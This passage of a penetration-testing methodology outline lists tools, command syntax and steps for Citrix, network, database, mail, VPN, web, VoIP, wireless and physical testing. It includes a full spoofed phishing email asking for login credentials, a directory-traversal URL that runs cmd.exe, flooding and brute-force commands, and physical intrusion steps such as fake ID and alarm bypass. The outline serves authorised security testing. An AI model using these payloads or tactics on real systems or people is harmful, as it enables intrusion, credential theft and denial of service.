21.4.3.5.1. Ctrl + h – View History
21.4.3.5.2. Ctrl + n – New Browser
21.4.3.5.3. Shift + Left Click – New Browser
21.4.3.5.4. Ctrl + o – Internet Address (browse feature)
21.4.3.5.5. Ctrl + p – Print (to file)
21.4.3.5.6. Right Click (Shift + F10)
21.4.3.5.7. F1 – Jump to URL
21.4.3.5.8. SHIFT+F1: Local Task List
21.4.3.5.9. SHIFT+F2: Toggle Title Bar
21.4.3.5.10. SHIFT+F3: Close Remote Application
21.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
21.4.3.5.12. CTRL+F2: Remote Task List
21.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
21.4.3.5.14. ALT+F2: Cycle through programs
21.4.3.5.15. ALT+PLUS: Alt+TAB
21.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB
21.5. Brute Force
21.5.1. bforce.js
21.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2
21.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt
21.5.1.3. Untitled
21.6. Review Configuration Files
21.6.1. Application server configuration file
21.6.1.1. appsrv.ini
21.6.1.1.1. Location
21.6.1.1.2. World writeable
21.6.1.1.3. Review other files
21.6.1.1.4. Sample file
21.6.2. Program Neighborhood configuration file
21.6.2.1. pn.ini
21.6.2.1.1. Location
21.6.2.1.2. Review other files
21.6.2.1.3. Sample file
21.6.3. Citrix ICA client configuration file
21.6.3.1. wfclient.ini
21.6.3.1.1. Location
21.7. References
21.7.1. Vulnerabilities
21.7.1.1. Art of Hacking
21.7.1.2. Common Vulnerabilities and Exploits (CVE)
21.7.1.2.1. Sample file
21.7.1.2.2. Untitled
21.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix
21.7.1.3. OSVDB
21.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia
21.7.1.4. Secunia
21.7.1.5. Security-database.com
21.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix
21.7.1.6. SecurityFocus
21.7.2. Support
21.7.2.1. Citrix
21.7.2.1.1. Knowledge Base
21.7.2.2. Thinworld
21.7.3. Exploits
21.7.3.1. Milw0rm
21.7.3.1.1. http://www.milw0rm.com/search.php
21.7.3.2. Art of Hacking
21.7.3.2.1. Citrix
21.7.4. Tools Resource
21.7.4.1. Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access
22. Network Backbone
22.1. Generic Toolset
22.1.1. Wireshark (Formerly Ethereal)
22.1.1.1. Passive Sniffing
22.1.1.1.1. Usernames/Passwords
22.1.1.1.2. Email
22.1.1.1.3. FTP
22.1.1.1.4. HTTP
22.1.1.1.5. HTTPS
22.1.1.1.6. RDP
22.1.1.1.7. VOIP
22.1.1.1.8. Other
22.1.1.2. Filters
22.1.1.2.1. ip.src == ip_address
22.1.1.2.2. ip.dst == ip_address
22.1.1.2.3. tcp.dstport == port_no.
22.1.1.2.4. ! ip.addr == ip_address
22.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)
22.1.2. Cain & Abel
22.1.2.1. Active Sniffing
22.1.2.1.1. ARP Cache Poisoning
22.1.2.1.2. DNS Poisoning
22.1.2.1.3. Routing Protocols
22.1.3. Cisco-Torch
22.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>
22.1.4. NTP-Fingerprint
22.1.4.1. perl ntp-fingerprint.pl -t [ip_address]
22.1.5. Yersinia
22.1.6. p0f
22.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]
22.1.7. Manual Check (Credentials required)
22.1.8. MAC Spoofing
22.1.8.1. mac address changer for windows
22.1.8.2. macchanger
22.1.8.2.1. Random Mac Address:- macchanger -r eth0
22.1.8.3. madmacs
22.1.8.4. smac
22.1.8.5. TMAC
23. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.
23.1. Password Attacks
23.1.1. Known Accounts
23.1.1.1. Identified Passwords
23.1.1.2. Unidentified Hashes
23.1.2. Default Accounts
23.1.2.1. Identified Passwords
23.1.2.2. Unidentified Hashes
23.2. Exploits
23.2.1. Successful Exploits
23.2.1.1. Accounts
23.2.1.1.1. Passwords
23.2.1.1.2. Groups
23.2.1.1.3. Other Details
23.2.1.2. Services
23.2.1.3. Backdoor
23.2.1.4. Connectivity
23.2.2. Unsuccessful Exploits
23.2.3. Resources
23.2.3.1. Securiteam
23.2.3.1.1. Exploits are sorted by year and must be downloaded individually
23.2.3.2. SecurityForest
23.2.3.2.1. Updated via CVS after initial install
23.2.3.3. GovernmentSecurity
23.2.3.3.1. Need to create and account to obtain access
23.2.3.4. Red Base Security
23.2.3.4.1. Oracle Exploit site only
23.2.3.5. Wireless Vulnerabilities & Exploits (WVE)
23.2.3.5.1. Wireless Exploit Site
23.2.3.6. PacketStorm Security
23.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.
23.2.3.7. SecWatch
23.2.3.7.1. Exploits sorted by year and month, download seperately
23.2.3.8. SecurityFocus
23.2.3.8.1. Exploits must be downloaded individually
23.2.3.9. Metasploit
23.2.3.9.1. Install and regualrly update via svn
23.2.3.10. Milw0rm
23.2.3.10.1. Exploit archived indexed and sorted by port download as a whole - The one to go for!
23.3. Tools
23.3.1. Metasploit
23.3.1.1. Free Extra Modules
23.3.1.1.1. local copy
23.3.2. Manual SQL Injection
23.3.2.1. Understanding SQL Injection
23.3.2.2. SQL Injection walkthrough
23.3.2.3. SQL Injection by example
23.3.2.4. Blind SQL Injection
23.3.2.5. Advanced SQL Injection in SQL Server
23.3.2.6. More Advanced SQL Injection
23.3.2.7. Advanced SQL Injection in Oracle databases
23.3.2.8. SQL Cheatsheets
23.3.2.8.1. Untitled
23.3.3. SQL Power Injector
23.3.4. SecurityForest
23.3.5. SPI Dynamics WebInspect
23.3.6. Core Impact
23.3.7. Cisco Global Exploiter
23.3.8. PIXDos
23.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]
23.3.9. CANVAS
23.3.10. Inguma
24. Server Specific Tests
24.1. Databases
24.1.1. Direct Access Interrogation
24.1.1.1. MS SQL Server
24.1.1.1.1. Ports
24.1.1.1.2. Version
24.1.1.1.3. osql
24.1.1.2. Oracle
24.1.1.2.1. Ports
24.1.1.2.2. TNS Listener
24.1.1.2.3. SQL Plus
24.1.1.2.4. Default Account/Passwords
24.1.1.2.5. Default SID's
24.1.1.3. MySQL
24.1.1.3.1. Ports
24.1.1.3.2. Version
24.1.1.3.3. Users/Passwords
24.1.1.4. DB2
24.1.1.5. Informix
24.1.1.6. Sybase
24.1.1.7. Other
24.1.2. Scans
24.1.2.1. Default Ports
24.1.2.2. Non-Default Ports
24.1.2.3. Instance Names
24.1.2.4. Versions
24.1.3. Password Attacks
24.1.3.1. Sniffed Passwords
24.1.3.1.1. Cracked Passwords
24.1.3.1.2. Hashes
24.1.3.2. Direct Access Guesses
24.1.4. Vulnerability Assessment
24.1.4.1. Automated
24.1.4.1.1. Reports
24.1.4.1.2. Vulnerabilities
24.1.4.2. Manual
24.1.4.2.1. Patch Levels
24.1.4.2.2. Confirmed Vulnerabilities
24.2. Mail
24.2.1. Scans
24.2.2. Fingerprint
24.2.2.1. Manual
24.2.2.2. Automated
24.2.3. Spoofable
24.2.3.1. Telnet spoof
24.2.3.1.1. telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>Online Security Manager.Target [email protected].
24.2.4. Relays
24.3. VPN
24.3.1. Scanning
24.3.1.1. 500 UDP IPSEC
24.3.1.2. 1723 TCP PPTP
24.3.1.3. 443 TCP/SSL
24.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27
24.3.1.5. ipsecscan 80.75.68.22 80.75.68.27
24.3.2. Fingerprinting
24.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27
24.3.3. PSK Crack
24.3.3.1. ikeprobe 80.75.68.27
24.3.3.2. sniff for responses with C&A or ikecrack
24.4. Web
24.4.1. Vulnerability Assessment
24.4.1.1. Automated
24.4.1.1.1. Reports
24.4.1.1.2. Vulnerabilities
24.4.1.2. Manual
24.4.1.2.1. Patch Levels
24.4.1.2.2. Confirmed Vulnerabilities
24.4.2. Permissions
24.4.2.1. PUT /test.txt HTTP/1.0
24.4.2.2. CONNECT mail.another.com:25 HTTP/1.0
24.4.2.3. POST http://mail.another.com:25/ HTTP/1.0Content-Type: text/plainContent-Length: 6
24.4.3. Scans
24.4.4. Fingerprinting
24.4.4.1. Other
24.4.4.2. HTTP
24.4.4.2.1. Commands
24.4.4.2.2. Modules
24.4.4.2.3. File Extensions
24.4.4.3. HTTPS
24.4.4.3.1. Commands
24.4.4.3.2. Commands
24.4.4.3.3. File Extensions
24.4.5. Directory Traversal
24.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
25. VoIP Security
25.1. Sniffing Tools
25.1.1. AuthTool
25.1.2. Cain & Abel
25.1.3. Etherpeek
25.1.4. NetDude
25.1.5. Oreka
25.1.6. PSIPDump
25.1.7. SIPomatic
25.1.8. SIPv6 Analyzer
25.1.9. UCSniff
25.1.10. VoiPong
25.1.11. VOMIT
25.1.12. Wireshark
25.1.13. WIST - Web Interface for SIP Trace
25.2. Scanning and Enumeration Tools
25.2.1. enumIAX
25.2.2. fping
25.2.3. IAX Enumerator
25.2.4. iWar
25.2.5. Nessus
25.2.6. Nmap
25.2.7. SIP Forum Test Framework (SFTF)
25.2.8. SIPcrack
25.2.9. sipflanker
25.2.9.1. python sipflanker.py 192.168.1-254
25.2.10. SIP-Scan
25.2.11. SIP.Tastic
25.2.12. SIPVicious
25.2.13. SiVuS
25.2.14. SMAP
25.2.14.1. smap IP_Address/Subnet_Mask
25.2.14.2. smap -o IP_Address/Subnet_Mask
25.2.14.3. smap -l IP_Address
25.2.15. snmpwalk
25.2.16. VLANping
25.2.17. VoIPAudit
25.2.18. VoIP GHDB Entries
25.2.19. VoIP Voicemail Database
25.3. Packet Creation and Flooding Tools
25.3.1. H.323 Injection Files
25.3.2. H225regreject
25.3.3. IAXHangup
25.3.4. IAXAuthJack
25.3.5. IAX.Brute
25.3.6. IAXFlooder
25.3.6.1. ./iaxflood sourcename destinationname numpackets
25.3.7. INVITE Flooder
25.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets
25.3.8. kphone-ddos
25.3.9. RTP Flooder
25.3.10. rtpbreak
25.3.11. Scapy
25.3.12. Seagull
25.3.13. SIPBomber
25.3.14. SIPNess
25.3.15. SIPp
25.3.16. SIPsak
25.3.16.1. Tracing paths: - sipsak -T -s sip:usernaem@domain
25.3.16.2. Options request:- sipsak -vv -s sip:username@domain
25.3.16.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
25.3.17. SIP-Send-Fun
25.3.18. SIPVicious
25.3.19. Spitter
25.3.20. TFTP Brute Force
25.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>
25.3.21. UDP Flooder
25.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets
25.3.22. UDP Flooder (with VLAN Support)
25.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets
25.3.23. Voiphopper
25.4. Fuzzing Tools
25.4.1. Asteroid
25.4.2. Codenomicon VoIP Fuzzers
25.4.3. Fuzzy Packet
25.4.4. Mu Security VoIP Fuzzing Platform
25.4.5. ohrwurm RTP Fuzzer
25.4.6. PROTOS H.323 Fuzzer
25.4.7. PROTOS SIP Fuzzer
25.4.8. SIP Forum Test Framework (SFTF)
25.4.9. Sip-Proxy
25.4.10. Spirent ThreatEx
25.5. Signaling Manipulation Tools
25.5.1. AuthTool
25.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
25.5.2. BYE Teardown
25.5.3. Check Sync Phone Rebooter
25.5.4. RedirectPoison
25.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"
25.5.5. Registration Adder
25.5.6. Registration Eraser
25.5.7. Registration Hijacker
25.5.8. SIP-Kill
25.5.9. SIP-Proxy-Kill
25.5.10. SIP-RedirectRTP
25.5.11. SipRogue
25.5.12. vnak
25.6. Media Manipulation Tools
25.6.1. RTP InsertSound
25.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
25.6.2. RTP MixSound
25.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
25.6.3. RTPProxy
25.6.4. RTPInject
25.7. Generic Software Suites
25.7.1. OAT Office Communication Server Tool Assessment
25.7.2. EnableSecurity VOIPPACK
25.7.2.1. Note: - Add-on for Immunity Canvas
25.8. References
25.8.1. URL's
25.8.1.1. Common Vulnerabilities and Exploits (CVE)
25.8.1.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip
25.8.1.2. Default Passwords
25.8.1.3. Hacking Exposed VoIP
25.8.1.3.1. Tool Pre-requisites
25.8.1.4. VoIPsa
25.8.2. White Papers
25.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems
25.8.2.2. An Analysis of VoIP Security Threats and Tools
25.8.2.3. Hacking VoIP Exposed
25.8.2.4. Security testing of SIP implementations
25.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks
25.8.2.6. Two attacks against VoIP
25.8.2.7. VoIP Attacks!
25.8.2.8. VoIP Security Audit Program (VSAP)
26. Wireless Penetration
26.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.
26.1.1. Site Map
26.1.1.1. RF Map
26.1.1.1.1. Lines of Sight
26.1.1.1.2. Signal Coverage
26.1.1.2. Physical Map
26.1.1.2.1. Triangulate APs
26.1.1.2.2. Satellite Imagery
26.1.2. Network Map
26.1.2.1. MAC Filter
26.1.2.1.1. Authorised MAC Addresses
26.1.2.1.2. Reaction to Spoofed MAC Addresses
26.1.2.2. Encryption Keys utilised
26.1.2.2.1. WEP
26.1.2.2.2. WPA/PSK
26.1.2.2.3. 802.1x
26.1.2.3. Access Points
26.1.2.3.1. ESSID
26.1.2.3.2. BSSIDs
26.1.2.4. Wireless Clients
26.1.2.4.1. MAC Addresses
26.1.2.4.2. Intercepted Traffic
26.2. Wireless Toolkit
26.2.1. Wireless Discovery
26.2.1.1. Aerosol
26.2.1.2. Airfart
26.2.1.3. Aphopper
26.2.1.4. Apradar
26.2.1.5. BAFFLE
26.2.1.6. inSSIDer
26.2.1.7. iWEPPro
26.2.1.8. karma
26.2.1.9. KisMAC-ng
26.2.1.10. Kismet
26.2.1.11. MiniStumbler
26.2.1.12. Netstumbler
26.2.1.13. Vistumbler
26.2.1.14. Wellenreiter
26.2.1.15. Wifi Hopper
26.2.1.16. WirelessMon
26.2.1.17. WiFiFoFum
26.2.2. Packet Capture
26.2.2.1. Airopeek
26.2.2.2. Airpcap
26.2.2.3. Airtraf
26.2.2.4. Apsniff
26.2.2.5. Cain
26.2.2.6. Commview
26.2.2.7. Ettercap
26.2.2.8. Netmon
26.2.2.8.1. nmwifi
26.2.2.9. Wireshark
26.2.3. EAP Attack tools
26.2.3.1. eapmd5pass
26.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump
26.2.3.1.2. Untitled
26.2.4. Leap Attack Tools
26.2.4.1. asleap
26.2.4.2. thc leap cracker
26.2.4.3. anwrap
26.2.5. WEP/ WPA Password Attack Tools
26.2.5.1. Airbase
26.2.5.2. Aircrack-ptw
26.2.5.3. Aircrack-ng
26.2.5.4. Airsnort
26.2.5.5. cowpatty
26.2.5.6. FiOS Wireless Key Calculator
26.2.5.7. iWifiHack
26.2.5.8. KisMAC-ng
26.2.5.9. Rainbow Tables
26.2.5.10. wep attack
26.2.5.11. wep crack
26.2.5.12. wzcook
26.2.6. Frame Generation Software
26.2.6.1. Airgobbler
26.2.6.2. airpwn
26.2.6.3. Airsnarf
26.2.6.4. Commview
26.2.6.5. fake ap
26.2.6.6. void 11
26.2.6.7. wifi tap
26.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]
26.2.6.8. FreeRADIUS - Wireless Pwnage Edition
26.2.7. Mapping Software
26.2.7.1. Online Mapping
26.2.7.1.1. WIGLE
26.2.7.1.2. Skyhook
26.2.7.2. Tools
26.2.7.2.1. Knsgem
26.2.8. File Format Conversion Tools
26.2.8.1. ns1 recovery and conversion tool
26.2.8.2. warbable
26.2.8.3. warkizniz
26.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]
26.2.8.4. ivstools
26.2.9. IDS Tools
26.2.9.1. WIDZ
26.2.9.2. War Scanner
26.2.9.3. Snort-Wireless
26.2.9.4. AirDefense
26.2.9.5. AirMagnet
26.3. WLAN discovery
26.3.1. Unencrypted WLAN
26.3.1.1. Visible SSID
26.3.1.1.1. Sniff for IP range
26.3.1.2. Hidden SSID
26.3.1.2.1. Deauth client
26.3.2. WEP encrypted WLAN
26.3.2.1. Visible SSID
26.3.2.1.1. WEPattack
26.3.2.2. Hidden SSID
26.3.2.2.1. Deauth client
26.3.3. WPA / WPA2 encrypted WLAN
26.3.3.1. Deauth client
26.3.3.1.1. Capture EAPOL handshake
26.3.4. LEAP encrypted WLAN
26.3.4.1. Deauth client
26.3.4.1.1. Break LEAP
26.3.5. 802.1x WLAN
26.3.5.1. Create Rogue Access Point
26.3.5.1.1. Airsnarf
26.3.5.1.2. fake ap
26.3.5.1.3. Hotspotter
26.3.5.1.4. Karma
26.3.5.1.5. Linux rogue AP
26.3.6. Resources
26.3.6.1. URL's
26.3.6.1.1. Wirelessdefence.org
26.3.6.1.2. Russix
26.3.6.1.3. Wardrive.net
26.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)
26.3.6.2. White Papers
26.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4
26.3.6.2.2. 802.11b Firmware-Level Attacks
26.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective
26.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment
26.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds
26.3.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz
26.3.6.2.7. Active behavioral fingerprinting of wireless devices
26.3.6.3. Common Vulnerabilities and Exploits (CVE)
26.3.6.3.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless
27. Physical Security
27.1. Building Security
27.1.1. Meeting Rooms
27.1.1.1. Check for active network jacks.
27.1.1.2. Check for any information in room.
27.1.2. Lobby
27.1.2.1. Check for active network jacks.
27.1.2.2. Does receptionist/guard leave lobby?
27.1.2.3. Accessbile printers? Print test page.
27.1.2.4. Obtain phone/personnel listing.
27.1.3. Communal Areas
27.1.3.1. Check for active network jacks.
27.1.3.2. Check for any information in room.
27.1.3.3. Listen for employee conversations.
27.1.4. Room Security
27.1.4.1. Resistance of lock to picking.
27.1.4.1.1. What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors?
27.1.4.2. Ceiling access areas.
27.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?
27.1.5. Windows
27.1.5.1. Check windows/doors for visible intruderalarm sensors.
27.1.5.2. Check visible areas for sensitive information.
27.1.5.3. Can you video users logging on?
27.2. Perimeter Security
27.2.1. Fence Security
27.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.
27.2.2. Exterior Doors
27.2.2.1. If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.
27.2.3. Guards
27.2.3.1. Patrol Routines
27.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.
27.2.3.2. Communications
27.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.
27.3. Entry Points
27.3.1. Guarded Doors
27.3.1.1. Piggybacking
27.3.1.1.1. Attempt to closely follow employees into thebuilding without having to show valid credentials.
27.3.1.2. Fake ID
27.3.1.2.1. Attempt to use fake ID to gain access.
27.3.1.3. Access Methods
27.3.1.3.1. Test 'out of hours' entry methods
27.3.2. Unguarded Doors
27.3.2.1. Identify all unguardedentry points.
27.3.2.1.1. Are doors secured?
27.3.2.1.2. Check locks for resistance to lock picking.
27.3.3. Windows
27.3.3.1. Check windows/doors for visible intruderalarm sensors.
27.3.3.1.1. Attempt to bypass sensors.
27.4. Office Waste
27.4.1. Dumpster DivingAttempt to retrieve any useful information from ToE refuse. This may include : printed documents, books, manuals, laptops, PDA's, USB memory devices, CD's, Floppy discs etc
28. Final Report - template
29. Contributors
29.1. Matt Byrne (WirelessDefence.org)
29.1.1. Matt contributed the majority of the Wireless section.
29.2. Arvind Doraiswamy (Paladion.net)
29.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.
29.3. Lee Lawson (Dns.co.uk)
29.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.